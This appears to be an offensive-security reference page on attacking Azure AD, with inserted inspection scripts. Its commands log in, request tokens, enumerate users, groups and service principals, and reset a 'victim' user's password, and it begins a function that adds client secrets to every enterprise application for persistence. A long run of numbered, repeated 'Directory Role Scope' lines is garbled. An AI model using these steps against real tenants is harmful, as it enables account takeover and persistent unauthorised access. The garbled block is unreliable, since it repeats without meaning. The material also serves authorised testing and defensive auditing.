Az - AzureAD (AAD)

Basic Information

Azure Active Directory (Azure AD) is Microsoft's cloud-based identity and access management service. It is central to letting employees sign in and access resources, both inside and outside the organization, including Microsoft 365, the Azure portal, and many SaaS applications. Azure AD's design centres on providing core identity services: authentication, authorization, and user management.

Key features of Azure AD include multi-factor authentication and conditional access, together with native integration with other Microsoft security services. These features considerably strengthen the security of user identities and let organizations enforce and manage their access policies effectively. As a core component of Microsoft's cloud service ecosystem, Azure AD is essential to cloud-based user management.

Entities

Enumeration

For this enumeration you can use the az cli tool, the AzureAD PowerShell module (or AzureAD Preview) and the Az PowerShell module.

On Linux you will need to install PowerShell Core:

sudo apt-get update
sudo apt-get install -y wget apt-transport-https software-properties-common

# Ubuntu 20.04
wget -q https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb

# Update repos
sudo apt-get update
sudo add-apt-repository universe

# Install & start powershell
sudo apt-get install -y powershell
pwsh

# Az cli
curl -sL https://aka.ms/InstallAzureCLIDeb | sudo bash

Module differences

  • AzureAD is a PowerShell module from Microsoft for managing Azure AD. It does not expose all the properties of Azure AD objects and cannot be used to access information about Azure resources.

  • Az PowerShell is a module for managing Azure resources from the PowerShell command line.

Connection

az login #This will open the browser
az login -u <username> -p <password> #Specify user and password
az login --identity #Use the current machine managed identity (metadata)
az login --identity -u /subscriptions/<subscriptionId>/resourcegroups/myRG/providers/Microsoft.ManagedIdentity/userAssignedIdentities/myID #Login with user managed identity
# Login as service principal
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p VerySecret --tenant contoso.onmicrosoft.com #With password
az login --service-principal -u http://azure-cli-2016-08-05-14-31-15 -p ~/mycertfile.pem --tenant contoso.onmicrosoft.com #With cert

# Request access token (ARM)
az account get-access-token
# Request access token for different resource. Supported tokens: aad-graph, arm, batch, data-lake, media, ms-graph, oss-rdbms
az account get-access-token --resource-type aad-graph

# If you want to configure some defaults
az configure

# Get user logged-in already
az ad signed-in-user show

# Help
az find "vm" # Find vm commands
az vm -h # Get subdomains
az ad user list --query-examples # Get examples
Connect-AzureAD #Open browser
# Using credentials
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential ("test@corp.onmicrosoft.com", $passwd)
Connect-AzureAD -Credential $creds

# Using tokens
## AzureAD cannot request tokens, but can use AADGraph and MSGraph tokens to connect
Connect-AzureAD -AccountId test@corp.onmicrosoft.com -AadAccessToken $token

In general, you can use Az PowerShell to work with Azure AD. You can do things such as add, update, or delete users, groups, and other Azure AD objects. You can also manage user permissions and much more.

Connect-AzAccount #Open browser
# Using credentials
$passwd = ConvertTo-SecureString "Welcome2022!" -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential("test@corp.onmicrosoft.com", $passwd)
Connect-AzAccount -Credential $creds

# Get Access Token
(Get-AzAccessToken).Token
# Request access token to other endpoints: AadGraph, AnalysisServices, Arm, Attestation, Batch, DataLake, KeyVault, MSGraph, OperationalInsights, ResourceManager, Storage, Synapse
Get-AzAccessToken -ResourceTypeName MSGraph
(Get-AzAccessToken -Resource "https://graph.microsoft.com").Token

# Connect with access token
Connect-AzAccount -AccountId test@corp.onmicrosoft.com -AccessToken $token
Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId <ACCOUNT-ID>
## The -AccessToken is from management.azure.com

# Connect with Service principal/enterprise app secret
$password = ConvertTo-SecureString 'KWEFNOIRFIPMWL.--DWPNVFI._EDWWEF_ADF~SODNFBWRBIF' -AsPlainText -Force
$creds = New-Object System.Management.Automation.PSCredential('2923847f-fca2-a420-df10-a01928bec653', $password)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant 29sd87e56-a192-a934-bca3-0398471ab4e7d

#All the Azure AD cmdlets have the format *-AzAD*
Get-Command *azad*
#Cmdlets for other Azure resources have the format *Az*
Get-Command *az*
#Using management
$Token = 'eyJ0eXAi..'
# List subscriptions
$URI = 'https://management.azure.com/subscriptions?api-version=2020-01-01'
$RequestParams = @{
Method  = 'GET'
Uri     = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value

# Using graph
Invoke-WebRequest -Uri "https://graph.windows.net/myorganization/users?api-version=1.6" -Headers @{Authorization="Bearer {0}" -f $Token}
# Request tokens to access endpoints
# ARM
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com&api-version=2017-09-01" -H secret:$IDENTITY_HEADER

# Vault
curl "$IDENTITY_ENDPOINT?resource=https://vault.azure.net&api-version=2017-09-01" -H secret:$IDENTITY_HEADER

When you log in to Azure through the CLI with any program, you are using an Azure Application from a tenant that belongs to Microsoft. These applications, like the ones you can create in your own account, have a client id. You won't see all of them in the lists of allowed applications visible in the console, but they are allowed by default.

For example, the PowerShell script uses the application with client id 1950a258-227b-4e31-a9cf-717495945fc2. Even though the application doesn't appear in the console, a sysadmin can block that application so that users cannot get access with tools that connect through it.

However, there are other application client-ids that will allow you to connect to Azure:

# The important part is the ClientId, which identifies the application to login inside Azure

$token = Invoke-Authorize -Credential $credential `
-ClientId '1dfb5f98-f363-4b0f-b63a-8d20ada1e62d' `
-Scope 'Files.Read.All openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "https://graphtryit-staging.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
-ClientId '65611c08-af8c-46fc-ad20-1888eb1b70d9' `
-Scope 'openid profile Sites.Read.All User.Read email' `
-Redirect_Uri "chrome-extension://imjekgehfljppdblckcmjggcoboemlah" `
-Verbose -Debug `
-InformationAction Continue

$token = Invoke-Authorize -Credential $credential `
-ClientId 'd3ce4cf8-6810-442d-b42e-375e14710095' `
-Scope 'openid' `
-Redirect_Uri "https://graphexplorer.azurewebsites.net/" `
-Verbose -Debug `
-InformationAction Continue
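Whichever client id and resource a token was requested for ends up in the token's own claims, so the first thing to do with a token obtained via `az account get-access-token`, `Get-AzAccessToken` or the managed-identity endpoint is to read them: `aud` tells you which resource will accept it, `tid` which tenant, `appid` which client application minted it and `exp` how long it is good for. The same check is what a defender runs over tokens or sign-in records to see which first-party client a session used. The script below is an added example, not code from the HackTricks page; it decodes a compact JWT without verifying the signature (inspection only), and its `KNOWN_CLIENT_IDS` table uses the client ids from this page with labels that are assumptions except for the Azure PowerShell one the page names. The sample token is constructed and unsigned.

```python
import base64
import json
import time
from typing import Optional

# Client ids that appear on this page. The page identifies only the first one
# (Azure PowerShell); the other labels are assumptions made for this example.
KNOWN_CLIENT_IDS = {
    "1950a258-227b-4e31-a9cf-717495945fc2": "Azure PowerShell",
    "1dfb5f98-f363-4b0f-b63a-8d20ada1e62d": "page-listed client (Files.Read.All / Sites.Read.All scopes)",
    "65611c08-af8c-46fc-ad20-1888eb1b70d9": "page-listed client (chrome-extension redirect)",
    "d3ce4cf8-6810-442d-b42e-375e14710095": "page-listed client (graphexplorer redirect)",
}


def b64url_decode(segment: str) -> bytes:
    """Decode one base64url segment, restoring the '=' padding that JWTs strip."""
    segment += "=" * (-len(segment) % 4)
    return base64.urlsafe_b64decode(segment)


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).decode().rstrip("=")


def decode_jwt_claims(token: str) -> dict:
    """Return the payload claims of a compact JWT. The signature is NOT verified:
    use this to inspect a token you already hold, never to make an
    authorization decision."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS: expected header.payload.signature")
    return json.loads(b64url_decode(parts[1]))


def summarize_token(token: str, now: Optional[int] = None) -> dict:
    """Extract the claims worth checking before using a token: the resource it is
    for (aud), the tenant (tid), the identity (upn/oid), the client application
    that requested it (appid), its scopes and whether it is still valid."""
    claims = decode_jwt_claims(token)
    now = int(time.time()) if now is None else now
    appid = claims.get("appid")
    exp = int(claims.get("exp", 0))
    return {
        "audience": claims.get("aud"),
        "tenant": claims.get("tid"),
        "subject": claims.get("upn") or claims.get("oid"),
        "client_id": appid,
        "client_label": KNOWN_CLIENT_IDS.get(appid, "unknown client id"),
        "scopes": sorted(claims["scp"].split()) if claims.get("scp") else [],
        "expired": exp <= now,
        "seconds_left": exp - now,
    }


# Constructed sample: claims shaped like an ARM access token. The signature
# segment is a placeholder, so no service would accept this token.
SAMPLE_CLAIMS = {
    "aud": "https://management.azure.com/",
    "iss": "https://sts.windows.net/00000000-0000-0000-0000-00000000cafe/",
    "tid": "00000000-0000-0000-0000-00000000cafe",
    "upn": "test@corp.onmicrosoft.com",
    "appid": "1950a258-227b-4e31-a9cf-717495945fc2",
    "scp": "user_impersonation",
    "exp": 1_700_000_000,
}


def build_sample_token() -> str:
    header = b64url_encode(json.dumps({"alg": "RS256", "typ": "JWT"}).encode())
    payload = b64url_encode(json.dumps(SAMPLE_CLAIMS).encode())
    return f"{header}.{payload}.placeholder-signature"


if __name__ == "__main__":
    # Real use: python3 inspect_token.py "$(az account get-access-token --query accessToken -o tsv)"
    import sys
    token = sys.argv[1] if len(sys.argv) > 1 else build_sample_token()
    print(json.dumps(summarize_token(token), indent=2))
```

Run it with no argument to see the constructed sample decoded, or pass a token as the first argument. A mismatch between `audience` and the endpoint you are about to call is the usual reason for a 401 when reusing tokens across ARM, AAD Graph and MS Graph.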

Users

# Enumerate users
az ad user list --output table
az ad user list --query "[].userPrincipalName"
# Get info of 1 user
az ad user show --id "test@corp.onmicrosoft.com"
# Search "admin" users
az ad user list --query "[].displayName" | findstr /i "admin"
az ad user list --query "[?contains(displayName,'admin')].displayName"
# Search attributes containing the word "password"
az ad user list | findstr /i "password" | findstr /v "null,"
# All users from AzureAD
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi==null]"
az ad user list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All users synced from on-prem
az ad user list --query "[].{osi:onPremisesSecurityIdentifier,upn:userPrincipalName}[?osi!=null]"
az ad user list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get groups where the user is a member
az ad user get-member-groups --id <email>
# Get roles assigned to the user
az role assignment list --include-groups --include-classic-administrators true --assignee <email>

AzureAD


# Enumerate Users
Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName
# Get info of 1 user
Get-AzureADUser -ObjectId test@corp.onmicrosoft.com | fl
# Search "admin" users
Get-AzureADUser -SearchString "admin" #Search admin at the beginning of DisplayName or userPrincipalName
Get-AzureADUser -All $true |?{$_.Displayname -match "admin"} #Search "admin" word in DisplayName
# Get all attributes of a user
Get-AzureADUser -ObjectId test@defcorphq.onmicrosoft.com|%{$_.PSObject.Properties.Name}
# Search attributes containing the word "password"
Get-AzureADUser -All $true |%{$Properties = $_;$Properties.PSObject.Properties.Name | % {if ($Properties.$_ -match 'password') {"$($Properties.UserPrincipalName) - $_ - $($Properties.$_)"}}}
# All users from AzureAD
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All users synced from on-prem
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Objects created by a/any user
Get-AzureADUser [-ObjectId <email>] | Get-AzureADUserCreatedObject
# Devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Objects owned by a specific user
Get-AzureADUserOwnedObject -ObjectId test@corp.onmicrosoft.com
# Get groups & roles where the user is a member
Get-AzureADUserMembership -ObjectId 'test@corp.onmicrosoft.com'
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId test@corp.onmicrosoft.com
# Get devices registered by a user
Get-AzureADUserRegisteredDevice -ObjectId test@defcorphq.onmicrosoft.com
# Apps where a user has a role (role not shown)
Get-AzureADUser -ObjectId roygcain@defcorphq.onmicrosoft.com | Get-AzureADUserAppRoleAssignment | fl *
# Get Administrative Units of a user
$userObj = Get-AzureADUser -Filter "UserPrincipalName eq 'bill@example.com'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq $userObj.ObjectId } }

Az PowerShell

# Enumerate users
Get-AzADUser
# Get details of a user
Get-AzADUser -UserPrincipalName test@defcorphq.onmicrosoft.com
# Search user by string
Get-AzADUser -SearchString "admin" #Search at the beginning of DisplayName
Get-AzADUser | ?{$_.Displayname -match "admin"}
# Get roles assigned to a user
Get-AzRoleAssignment -SignInName test@corp.onmicrosoft.com

Change user password

$password = "ThisIsTheNewPassword.!123" | ConvertTo-SecureString -AsPlainText -Force

(Get-AzureADUser -All $true | ?{$_.UserPrincipalName -eq "victim@corp.onmicrosoft.com"}).ObjectId | Set-AzureADUserPassword -Password $password -Verbose

MFA & Conditional Access Policies

It is highly recommended to enable MFA for every user; however, some companies won't set it, or will set it through a Conditional Access Policy: the user is only prompted for MFA when signing in from a specific location, browser or under some other condition. These policies, if not configured correctly, may be easy to bypass. Check:

See: Az - Conditional Access Policies / MFA Bypass

Groups

# Enumerate groups
az ad group list
az ad group list --query "[].[displayName]" -o table
# Get info of 1 group
az ad group show --group <group>
# Get "admin" groups
az ad group list --query "[].displayName" | findstr /i "admin"
az ad group list --query "[?contains(displayName,'admin')].displayName"
# All groups from AzureAD
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi==null]"
az ad group list --query "[?onPremisesSecurityIdentifier==null].displayName"
# All groups synced from on-prem
az ad group list --query "[].{osi:onPremisesSecurityIdentifier,displayName:displayName,description:description}[?osi!=null]"
az ad group list --query "[?onPremisesSecurityIdentifier!=null].displayName"
# Get members of group
az ad group member list --group <group> --query "[].userPrincipalName" -o table
# Check if member of group
az ad group member check --group "VM Admins" --member-id <id>
# Get which groups a group is member of
az ad group get-member-groups -g "VM Admins"
# Get Apps where a group has a role (role not shown)
Get-AzureADGroup -ObjectId <id> | Get-AzureADGroupAppRoleAssignment | fl *
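The `--query`/`findstr` filters used in the Users section and again here for groups are the same three checks over the JSON that `az ad user list -o json` and `az ad group list -o json` return: split cloud-only objects from on-prem-synced ones via `onPremisesSecurityIdentifier`, search display names for "admin", and look for non-null attributes that mention "password". The script below is an added example, not part of the original page; it runs those checks offline over constructed sample objects shaped like that output and generalizes them to any list of directory objects (users, groups, anything with `displayName`). It also handles a difference the one-liners hide: `findstr /i` is case-insensitive, while JMESPath `contains()` is not, so `contains(displayName,'admin')` silently misses a "Global Admin".

```python
import json

# Constructed sample shaped like `az ad user list -o json`, trimmed to the
# properties the filters use. The SIDs are made up.
SAMPLE_USERS_JSON = """[
  {"displayName": "Global Admin", "userPrincipalName": "gadmin@corp.onmicrosoft.com",
   "onPremisesSecurityIdentifier": null, "passwordPolicies": "DisablePasswordExpiration"},
  {"displayName": "Helpdesk Administrator", "userPrincipalName": "helpdesk@corp.onmicrosoft.com",
   "onPremisesSecurityIdentifier": "S-1-5-21-1111111111-2222222222-3333333333-1105", "passwordPolicies": null},
  {"displayName": "Alice Example", "userPrincipalName": "alice@corp.onmicrosoft.com",
   "onPremisesSecurityIdentifier": "S-1-5-21-1111111111-2222222222-3333333333-1106", "passwordPolicies": null}
]"""

# Constructed sample shaped like `az ad group list -o json`.
SAMPLE_GROUPS_JSON = """[
  {"displayName": "VM Admins", "description": "Local admin on VMs", "onPremisesSecurityIdentifier": null},
  {"displayName": "Finance", "description": "synced from on-prem AD",
   "onPremisesSecurityIdentifier": "S-1-5-21-1111111111-2222222222-3333333333-2001"}
]"""


def load_sample_users():
    return json.loads(SAMPLE_USERS_JSON)


def load_sample_groups():
    return json.loads(SAMPLE_GROUPS_JSON)


def split_cloud_and_synced(objects):
    """Equivalent of `[?onPremisesSecurityIdentifier==null]` and `!=null`:
    objects synced from on-prem AD carry their on-prem SID, cloud-native ones do not."""
    cloud_only = [o for o in objects if o.get("onPremisesSecurityIdentifier") is None]
    synced = [o for o in objects if o.get("onPremisesSecurityIdentifier") is not None]
    return cloud_only, synced


def find_by_display_name(objects, needle):
    """Case-insensitive substring match on displayName, like `findstr /i`.
    JMESPath contains() is case-sensitive, so this catches names the
    `contains(displayName,'admin')` query would miss."""
    n = needle.lower()
    return [o["displayName"] for o in objects if n in (o.get("displayName") or "").lower()]


def attributes_mentioning(objects, word, key="userPrincipalName"):
    """Non-null attributes whose name or value contains `word`, as
    `findstr /i "password" | findstr /v "null,"` does over the raw JSON.
    Returns (identity, attribute, value) tuples."""
    w = word.lower()
    hits = []
    for o in objects:
        for attr, value in o.items():
            if value is None:
                continue
            if w in attr.lower() or w in str(value).lower():
                hits.append((o.get(key) or o.get("displayName"), attr, value))
    return hits


if __name__ == "__main__":
    # Real use: feed the output of `az ad user list -o json` to json.load instead.
    users = load_sample_users()
    cloud, synced = split_cloud_and_synced(users)
    print("cloud-only users:", [u["userPrincipalName"] for u in cloud])
    print("synced users:", [u["userPrincipalName"] for u in synced])
    print("admin-like names:", find_by_display_name(users, "admin"))
    print("password attributes:", attributes_mentioning(users, "password"))
    groups = load_sample_groups()
    print("cloud-only groups:", find_by_display_name(split_cloud_and_synced(groups)[0], ""))
```

The cloud-only/synced split matters for both users and groups: cloud-only objects can be changed entirely from Azure AD, while synced ones are mastered on-prem and a cloud-side change is usually overwritten by the next sync cycle.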

AzureAD


# Enumerate Groups
Get-AzureADGroup -All $true
# Get info of 1 group
Get-AzureADGroup -ObjectId <id> | fl
# Get "admin" groups
Get-AzureADGroup -SearchString "admin" | fl #Groups starting by "admin"
Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"} #Groups with the word "admin"
# Get groups allowing dynamic membership
Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
# All groups that are from Azure AD
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -eq $null}
# All groups that are synced from on-prem (note that security groups are not synced)
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier -ne $null}
# Get members of a group
Get-AzureADGroupMember -ObjectId <id>
# Get roles of group
Get-AzureADMSGroup -SearchString "Contoso_Helpdesk_Administrators" #Get group id
Get-AzureADMSRoleAssignment -Filter "principalId eq '69584002-b4d1-4055-9c94-320542efd653'"
# Get Administrative Units of a group
$groupObj = Get-AzureADGroup -Filter "displayname eq 'TestGroup'"
Get-AzureADMSAdministrativeUnit | where { Get-AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq $groupObj.ObjectId} }

Az PowerShell

# Get all groups
Get-AzADGroup
# Get details of a group
Get-AzADGroup -ObjectId <id>
# Search group by string
Get-AzADGroup -SearchString "admin" | fl * #Search at the beginning of DisplayName
Get-AzADGroup |?{$_.Displayname -match "admin"}
# Get members of group
Get-AzADGroupMember -GroupDisplayName <group_name>
# Get roles of group (role assignments where the group is the principal)
Get-AzRoleAssignment -ObjectId <group_object_id>

Add user to group

Group owners can add new users to the group

Add-AzureADGroupMember -ObjectId <group_id> -RefObjectId <user_id> -Verbose

Groups can be dynamic, which basically means that a user who meets certain conditions is automatically added to the group. Of course, if the conditions depend on attributes the user can control, they could abuse this feature to get into other groups. Check how dynamic groups can be abused on the following page:

See: Az - Dynamic Groups Privesc

Service Principals / Enterprise Applications

Note that what PowerShell calls a Service Principal is called an Enterprise Application in the Azure portal (web UI).

# Get Service Principals
az ad sp list --all
az ad sp list --all --query "[].[displayName]" -o table
# Get details of one SP
az ad sp show --id 00000000-0000-0000-0000-000000000000
# Search SP by string
az ad sp list --all --query "[?contains(displayName,'app')].displayName"
# Get owner of service principal
az ad sp owner list --id <id> --query "[].[displayName]" -o table
# Get service principals owned by the current user
az ad sp list --show-mine
# List apps that have password credentials
# Note: SPs without secrets have an empty list here, not null, so `!= null` would match every SP
az ad sp list --all --query '[?length(passwordCredentials) > `0`].displayName'
# List apps that have key credentials (use of certificate authentication)
az ad sp list --all --query '[?length(keyCredentials) > `0`].displayName'
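Service principal credentials are what an attacker who reads them logs in with (`az login --service-principal` above), so a defender wants an inventory of which SPs hold password or certificate credentials and which of those are expired or about to expire. The script below is an added example, not part of the original page; it runs over constructed sample objects shaped like `az ad sp list --all -o json` (with the `passwordCredentials`/`keyCredentials` arrays and their `endDateTime` fields) and also shows why a plain `!= null` test on those arrays is wrong: an SP with no secrets carries an empty list, not null.

```python
import json
from datetime import datetime, timedelta, timezone

# Constructed sample shaped like `az ad sp list --all -o json`, trimmed to the
# credential properties. The appIds and dates are made up.
SAMPLE_SP_JSON = """[
  {"displayName": "ci-deployer", "appId": "11111111-1111-1111-1111-111111111111",
   "passwordCredentials": [{"displayName": "ci", "endDateTime": "2024-06-30T00:00:00Z"}],
   "keyCredentials": []},
  {"displayName": "legacy-reporting", "appId": "22222222-2222-2222-2222-222222222222",
   "passwordCredentials": [{"displayName": "old", "endDateTime": "2023-01-01T00:00:00Z"},
                           {"displayName": "new", "endDateTime": "2025-01-01T00:00:00Z"}],
   "keyCredentials": []},
  {"displayName": "cert-only-app", "appId": "33333333-3333-3333-3333-333333333333",
   "passwordCredentials": [],
   "keyCredentials": [{"displayName": "cert", "endDateTime": "2026-01-01T00:00:00Z"}]},
  {"displayName": "no-creds", "appId": "44444444-4444-4444-4444-444444444444",
   "passwordCredentials": [], "keyCredentials": []}
]"""


def load_sample_sps():
    return json.loads(SAMPLE_SP_JSON)


def parse_graph_time(s):
    """Graph timestamps end in 'Z'; make them timezone-aware datetimes."""
    return datetime.fromisoformat(s.replace("Z", "+00:00"))


def naive_not_null_filter(sps):
    """What `[?passwordCredentials != null]` actually selects: every SP,
    because an empty list is not null."""
    return [sp["displayName"] for sp in sps if sp.get("passwordCredentials") is not None]


def with_password_credentials(sps):
    """The correct test: at least one password credential present."""
    return [sp["displayName"] for sp in sps if len(sp.get("passwordCredentials") or []) > 0]


def credential_report(sps, now, warn_days=30):
    """Per-SP counts of password/key credentials and how many are expired or
    expire within `warn_days` of `now` (a timezone-aware datetime)."""
    rows = []
    for sp in sps:
        pw = sp.get("passwordCredentials") or []
        keys = sp.get("keyCredentials") or []
        ends = [parse_graph_time(c["endDateTime"]) for c in pw + keys if c.get("endDateTime")]
        rows.append({
            "displayName": sp["displayName"],
            "password_count": len(pw),
            "key_count": len(keys),
            "expired": sum(1 for e in ends if e <= now),
            "expiring_soon": sum(1 for e in ends if now < e <= now + timedelta(days=warn_days)),
        })
    return rows


def report_for_sample(now_iso="2024-06-15T00:00:00Z", warn_days=30):
    """Run the report over the constructed sample, keyed by displayName."""
    rows = credential_report(load_sample_sps(), parse_graph_time(now_iso), warn_days)
    return {r["displayName"]: r for r in rows}


if __name__ == "__main__":
    # Real use: json.load the output of `az ad sp list --all -o json` and pass datetime.now(timezone.utc)
    print("naive != null filter matches:", naive_not_null_filter(load_sample_sps()))
    print("SPs with password credentials:", with_password_credentials(load_sample_sps()))
    for row in credential_report(load_sample_sps(), datetime.now(timezone.utc)):
        print(row)
```

Expired credentials left on an SP are a sign nobody is rotating them, and a credential that is still valid on an SP no one recognises is worth investigating, since adding a secret to an existing SP is a common way of keeping access after an initial compromise.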

AzureAD


# Get Service Principals
Get-AzureADServicePrincipal -All $true
# Get details about a SP
Get-AzureADServicePrincipal -ObjectId <id> | fl *
# Get SP by string name or Id
Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -match "app"} | fl
Get-AzureADServicePrincipal -All $true | ?{$_.AppId -match "103947652-1234-5834-103846517389"}
# Get owner of SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwner |fl *
# Get objects owned by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalOwnedObject
# Get objects created by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalCreatedObject
# Get groups where the SP is a member
Get-AzureADServicePrincipal | Get-AzureADServicePrincipalMembership
Get-AzureADServicePrincipal -ObjectId <id> | Get-AzureADServicePrincipalMembership |fl *

Az PowerShell


    Get-AzADDirectoryRoleScopeMember
  82. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  83. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  84. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  85. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  86. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  87. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  88. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  89. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  90. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  91. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  92. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  93. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  94. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  95. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  96. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  97. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  98. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  99. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  100. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  101. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  102. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  103. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  104. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  105. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  106. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  107. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  108. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  109. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  110. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  111. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  112. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  113. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  114. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  115. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  116. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  117. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  118. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  119. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  120. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  121. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  122. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  123. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  124. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  125. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  126. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  127. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  128. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  129. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  130. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  131. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  132. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  133. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  134. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  135. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  136. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  137. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  138. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  139. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  140. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  141. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  142. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  143. List Azure AD Directory Role Scope Members

    Get-AzADDirectoryRoleScopeMember
  144. List Azure AD Directory Role Scopes

    Get-AzADDirectoryRoleScope
  145. **List Azure AD Directory

```powershell
# Get SPs
Get-AzADServicePrincipal
# Get info of 1 SP
Get-AzADServicePrincipal -ObjectId <id>
# Search SP by string
Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
# Get roles of a SP
Get-AzRoleAssignment -ServicePrincipalName <String>
# List applications straight from Microsoft Graph with a bearer token
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
    Method  = 'GET'
    Uri     = $URI
    Headers = @{
        'Authorization' = "Bearer $Token"
    }
}
(Invoke-RestMethod @RequestParams).value
```

The owner of a Service Principal can change its password.

Enumerate and try to add a client secret to every Enterprise Application

```powershell
# Just call Add-AzADAppSecret
Function Add-AzADAppSecret
{
<#
    .SYNOPSIS
        Add client secret to the applications.

    .PARAMETER GraphToken
        Pass the Graph API Token

    .EXAMPLE
        PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..'

    .LINK
        https://docs.microsoft.com/en-us/graph/api/application-list?view=graph-rest-1.0&tabs=http
